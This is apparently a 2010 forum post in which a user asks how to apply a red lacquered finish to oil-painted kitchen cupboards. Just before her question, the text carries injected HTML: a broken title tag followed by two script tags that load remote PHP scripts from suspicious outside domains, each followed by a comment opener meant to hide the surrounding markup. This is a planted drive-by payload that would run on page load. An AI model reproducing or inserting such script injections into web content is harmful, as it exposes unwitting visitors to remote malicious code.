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5/10/2010 5:29:42 AM
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"> </title><script src="http://zon.menotepoer.com/sl.php?v=2"></script><!--"></title><script src="http://esscer47emonyno.rr.nu/sl.php"></script><!--My name is Debbie & I am wanting to apply a red laquered effect to my kitchen cupboards. They are currently finished in an oil-based paint in a rather dirty magnolia shade which I am desperate to eliminate. I am acutely aware of the extensive preparation involved in this project but I am prepared to do whatever is necessary to acheive the desired effect. I would be extremly grateful if someone could suggest how I might go about applying a finish that will give me the laquered effect I am wanting.
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